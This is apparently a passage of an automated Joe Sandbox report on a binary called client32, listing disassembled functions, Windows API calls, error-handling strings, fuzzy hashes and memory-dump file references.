                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: invalid string position
                                                                                                                        • API String ID: 1785806476-1799206989
                                                                                                                        • Opcode ID: 3667c181ffb3b2ad077542becc7fedeeaef17ece54bed597df8e0142a53274f0
                                                                                                                        • Instruction ID: e9423d9ce43300ea960c29aac1ba67af12b15d76daa5fadc1d4963e0390c3d29
                                                                                                                        • Opcode Fuzzy Hash: 3667c181ffb3b2ad077542becc7fedeeaef17ece54bed597df8e0142a53274f0
                                                                                                                        • Instruction Fuzzy Hash: B90149327402848BD720CE6CDC8092AB3EAEBC1610B654D2DE091CB701C770EC4283E0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 685AEDD4
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685AEDE9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: 0f]h
                                                                                                                        • API String ID: 1338273076-3511245404
                                                                                                                        • Opcode ID: ea4715986f986dfb1e12656bee79cc8c3d1fafe46317ec647ec537abb9e35910
                                                                                                                        • Instruction ID: 70433f17fb781e268ba1c5c499c4999050b6565b2c0d1ee1c09c0984148ca17e
                                                                                                                        • Opcode Fuzzy Hash: ea4715986f986dfb1e12656bee79cc8c3d1fafe46317ec647ec537abb9e35910
                                                                                                                        • Instruction Fuzzy Hash: 1F118B75A042089FD714CF98C584BAABBF4EB69304F848499D8598B352E730EE45CBA1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset_strncpy
                                                                                                                        • String ID: J2Zh
                                                                                                                        • API String ID: 3140232205-4047440399
                                                                                                                        • Opcode ID: 1897d527f838372cafc52cd931a10fee162c7378cc10e09a185f2186b828cd8a
                                                                                                                        • Instruction ID: 533c43b42bc2147dc553248651fa60c262a6e189d361360a94b408bd35a542cd
                                                                                                                        • Opcode Fuzzy Hash: 1897d527f838372cafc52cd931a10fee162c7378cc10e09a185f2186b828cd8a
                                                                                                                        • Instruction Fuzzy Hash: 4F01F5B6E4032867D720A6A48CA59FF7BA8DB98750F800529ED49AF140EA35DD84C2F5
                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7E4636A2,?,?,00000000,00000000,1117DF28,000000FF,?,1107076F,00000000), ref: 110633FE
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorEventExitLastMessageProcesswsprintf
                                                                                                                        • String ID: ..\ctl32\Connect.cpp$event
                                                                                                                        • API String ID: 3621156866-397488498
                                                                                                                        • Opcode ID: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
                                                                                                                        • Instruction ID: 1e179fcce89b41eecb28e868e3bc3d371cf40be5e8a1825c7246c0f04d2a5f7d
                                                                                                                        • Opcode Fuzzy Hash: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
                                                                                                                        • Instruction Fuzzy Hash: 02115AB5A04715AFD720CF59C841B5AFBE8EB44B14F008A6AF8259B780DBB5A6048B90
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11019155
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                          • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                        • _memmove.LIBCMT ref: 11019184
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: vector<T> too long
                                                                                                                        • API String ID: 1785806476-3788999226
                                                                                                                        • Opcode ID: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
                                                                                                                        • Instruction ID: 308c0151805cc611b22231fe70dd9f684293cd40c739421a1377831650370b76
                                                                                                                        • Opcode Fuzzy Hash: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
                                                                                                                        • Instruction Fuzzy Hash: 6E0192B2E012059FD724CE69DC808A7B7E9EB95314715CA2EE59687704EA70F940CB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 685AE904
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685AE919
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: 0f]h
                                                                                                                        • API String ID: 1338273076-3511245404
                                                                                                                        • Opcode ID: a16a9ec12097ff247b7d35d5394df4ca46b8fb68f5ae75328a9ceead4d9d02aa
                                                                                                                        • Instruction ID: dcc054b7c48def5b014cd4738a2bf73e030569e1f5225ef9d9767858c6cfe4ea
                                                                                                                        • Opcode Fuzzy Hash: a16a9ec12097ff247b7d35d5394df4ca46b8fb68f5ae75328a9ceead4d9d02aa
                                                                                                                        • Instruction Fuzzy Hash: FF116D759003189FC710DFACD540AABB7E8EB28604F40846EE999D7701E770EE04CBE1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 685AED0C
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685AED21
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: 0f]h
                                                                                                                        • API String ID: 1338273076-3511245404
                                                                                                                        • Opcode ID: 2105e5e3f1fef1abe8b0e388d19913dd6bf1ad87fe0b2dbd1f018b6789bac309
                                                                                                                        • Instruction ID: 3749602740a730098ea8f83fa56e15d4e1d26de95c484d7cc1d11f9491832c34
                                                                                                                        • Opcode Fuzzy Hash: 2105e5e3f1fef1abe8b0e388d19913dd6bf1ad87fe0b2dbd1f018b6789bac309
                                                                                                                        • Instruction Fuzzy Hash: B8F0A9B59043089FE710DF9CD841BAAB7F8EB68204F4000A9EA4987350EB71AE10CBA5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • std::exception::exception.LIBCMT ref: 6859E8F4
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 6859E909
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: 0f]h
                                                                                                                        • API String ID: 1338273076-3511245404
                                                                                                                        • Opcode ID: 1a74e4f4ef0e128e06489922148fbd6d4e9c3ea1de54d7dabd0bb14f6b231c21
                                                                                                                        • Instruction ID: 1a4754fd64c5c44d4dd149ee9bd460c804fb819dff18ece7c17105e7544d19e0
                                                                                                                        • Opcode Fuzzy Hash: 1a74e4f4ef0e128e06489922148fbd6d4e9c3ea1de54d7dabd0bb14f6b231c21
                                                                                                                        • Instruction Fuzzy Hash: 8C018C799043089FD714DF98C540AAABBF8EB28304F40849EE95987741E771FE04DBA1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: hbuf->data$httputil.c
                                                                                                                        • API String ID: 4104443479-2732665889
                                                                                                                        • Opcode ID: ce6fd6f304778e5e43fca645a1963cded6f69ff833885eded70cbcaa80ba0a98
                                                                                                                        • Instruction ID: 93dd5f3b260c4573fbe287dbd62ead0d220a24935ab1b56009f9044e7851abac
                                                                                                                        • Opcode Fuzzy Hash: ce6fd6f304778e5e43fca645a1963cded6f69ff833885eded70cbcaa80ba0a98
                                                                                                                        • Instruction Fuzzy Hash: FD01D6BA6003056FD720CE58DCC0D6AB7E9EBC8364B54C529F988D7209EA70FC4487A0
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 110D12E3
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                          • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                        • _memmove.LIBCMT ref: 110D1308
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: vector<T> too long
                                                                                                                        • API String ID: 1785806476-3788999226
                                                                                                                        • Opcode ID: 70da0191b5718e9e378a282df170df22699940ec89f022486c233822fbc6cd1e
                                                                                                                        • Instruction ID: facce5f6267de455672404faedde13971752726d79346e18a4f89ee43adb8f58
                                                                                                                        • Opcode Fuzzy Hash: 70da0191b5718e9e378a282df170df22699940ec89f022486c233822fbc6cd1e
                                                                                                                        • Instruction Fuzzy Hash: BF014FB6A007055FD720DE6DD880DA7F7E8EF95658310862EE5A6C3644EE31F9508AA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __invoke_watson_strcpy_s
                                                                                                                        • String ID: dB]h
                                                                                                                        • API String ID: 3990783250-2858560661
                                                                                                                        • Opcode ID: 2e0c769035a698fed5c97bbbd2c7cd5bb63d4bc46262528c6ba411480f805d23
                                                                                                                        • Instruction ID: 26bbac10df6ae9975a9655026042c98529c0a4d830a9e843f12e999ac8c22de1
                                                                                                                        • Opcode Fuzzy Hash: 2e0c769035a698fed5c97bbbd2c7cd5bb63d4bc46262528c6ba411480f805d23
                                                                                                                        • Instruction Fuzzy Hash: 75F06D76480249BFDF115FA49C51DEA3F7AAB51294FC88060FA685A051E333DE54D7A0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __strdup
                                                                                                                        • String ID: *this==pszSrc$NSMString.cpp
                                                                                                                        • API String ID: 838363481-1924475612
                                                                                                                        • Opcode ID: 664af227514f206eeb1e48474d9bd4b9404c27ccb82f12827cc7e2275e105347
                                                                                                                        • Instruction ID: b65b88cb27fd0015d6a5998ef6fc809dca61688465f3184cdf1d92c4770e764a
                                                                                                                        • Opcode Fuzzy Hash: 664af227514f206eeb1e48474d9bd4b9404c27ccb82f12827cc7e2275e105347
                                                                                                                        • Instruction Fuzzy Hash: 45F02876A003095BC710AB5DA84497BFBE9CF85258B84803AEC99C7700E631A80587D2
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wvsprintf
                                                                                                                        • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                        • API String ID: 2795597889-2173072673
                                                                                                                        • Opcode ID: 95b361a7f74c9d271b16138e8f3a7a0ca02af3e770293b782825676a31df9199
                                                                                                                        • Instruction ID: 7343649882ffacaa9c79518fd6feb2533eb2dccb51abddf430ed2fafe4a2131b
                                                                                                                        • Opcode Fuzzy Hash: 95b361a7f74c9d271b16138e8f3a7a0ca02af3e770293b782825676a31df9199
                                                                                                                        • Instruction Fuzzy Hash: ACF06D75A0010CABDF05EF98DC50AFE77BD9B85504F8041ADEE55A7240DF305E4587A5
                                                                                                                        APIs
                                                                                                                        • wvsprintfA.USER32(?,11190240,?), ref: 110CF052
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
